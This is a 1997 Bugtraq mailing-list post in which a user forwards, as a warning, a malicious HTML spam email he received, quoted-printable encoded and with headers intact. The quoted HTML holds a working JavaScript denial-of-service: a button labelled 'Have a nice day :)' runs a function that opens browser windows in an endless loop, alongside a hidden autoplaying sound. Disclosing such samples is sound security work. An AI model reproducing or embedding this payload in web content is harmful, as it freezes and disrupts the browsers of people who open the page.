[4235] in bugtraq
Another one javascript exploit attempt?
daemon@ATHENA.MIT.EDU (Andrew V. Kovalev)
Mon Apr 7 14:35:22 1997
Date: Mon, 7 Apr 1997 13:55:00 +0400
Reply-To: "Andrew V. Kovalev" <Andrew.V.Kovalev@JET.MSK.SU>
From: "Andrew V. Kovalev" <Andrew.V.Kovalev@JET.MSK.SU>
To: BUGTRAQ@NETSPACE.ORG
Here is what I got from my mailbox today.. I use elm so I wasn't harmed
but it seems that someone is attempting to launch an attack.
To prevent damage I changed keyword "Javascript" to "ScriptoJav"..
=3D=3D=3D=3D=3DCut here=3D=3D=3D=3D=3D
From jet.msk.su!demos!kremvax.demos.su!hotmail.com!SuperSpammer Mon Apr=
7 13:17:24 1997
Received: from jet.msk.su by jet.msk.su ; Mon, 7 Apr 97 13:17 MSD
Received: from demos by jet.msk.su ; Mon, 7 Apr 97 13:17 MSD
Received: by kremvax.demos.su (uumail v3.2.4/D) for avk@jet.msk.su;
Sun, 6 Apr 1997 21:40:05 +0400
Received: by kremvax.demos.su (8.6.13/D) from mindlink.net [204.174.16.=
1]
for <avk@jet.msk.su> with ESMTP id UAA26981; Sun, 6 Apr 1997 =
20:40:01 +0300
From: SuperSpammer@hotmail.com
Received: from tr74.mka.net [206.173.17.154] with smtp
by rsoft.rsoft.bc.ca with smtp
(Smail-3.2 1996-Jul-4 #1 #1) id m0wDv4j-001mqrC; Sun, 6 Apr 199=
7 09:45:53 -0700 (PDT)
Message-Id: <m0wDv4j-001mqrC@rsoft.rsoft.bc.ca>
Date: Sun, 6 Apr 1997 09:45:53 -0700 (PDT)
To: avk@jet.msk.su
Subject: I'm not a spammer!
Content-Type: text/html; charset=3Dkoi8-r
Content-Length: 1239
Status: RO
<HTML>
<HEAD>
</HEAD>
<BODY TEXT=3D"#FF0000" BGCOLOR=3D"#000000" LINK=3D"#0000EE" VLINK=3D"#5=
51A8B" ALINK=3D"#FF0000">
<P><BASE HREF=3D"http://www.idsoftware.com/">
<SCRIPT language=3D"JavaScript"><!--
if(navigator.userAgent.indexOf("MSIE") !=3D -1)
document.writeln ('<bgsound src=3D"beast.wav">');else
document.writeln ('<embed src=3D"beast.wav" autostart=3Dtrue hidden=3D=
true>');
function Oops()
{
var Counter =3D 0
while (true)
{
window.open("http://www.netscape.com","Haha" + Counter,"width=3D=
22,height=3D22,resizable=3Dno")
Counter++
}
}// --></SCRIPT>
</P>
<P><FORM method=3Dpost name=3D"FormAction" action=3D"mailto:"+"s-spamme=
r@hotmail.com"></P>
<CENTER><TABLE BORDER=3D1 WIDTH=3D"100%" HEIGHT=3D"2000" BGCOLOR=3D"#00=
0000" >
<TR>
<TD>
<CENTER><P>=F1 =D7=C1=CD =CE=C5 =D3=D0=C1=CD=CD=C5=D2...</P></CENTER>
</TD>
</TR>
<TR>
<TD>
<CENTER><P><FONT SIZE=3D+1>=F1 =D7=C1=CD =CE=C5 =D3=D0=C1=CD=CD=C5=D2..=
.</FONT></P></CENTER>
</TD>
</TR>
<TR>
<TD>
<CENTER><P><FONT SIZE=3D+3>=F1 =F7=E1=ED =EE=E5 =F3=F0=E1=ED=ED=E5=F2 !=
</FONT></P></CENTER>
</TD>
</TR>
<TR>
<TD>
<CENTER><P><B><FONT SIZE=3D+4>=F1 -</FONT></B></P></CENTER>
<CENTER><P><B><FONT SIZE=3D+4>=F3=F5=F0=E5=F2=F3=F0=E1=ED=ED=E5=F2 !</F=
ONT></B></P></CENTER>
</TD>
</TR>
</TABLE>
<P><INPUT TYPE=3D"button" value=3D"Have a nice day :)" onClick=3D"Oops(=
)"></P>
</CENTER>
</BODY>
</HTML>
--
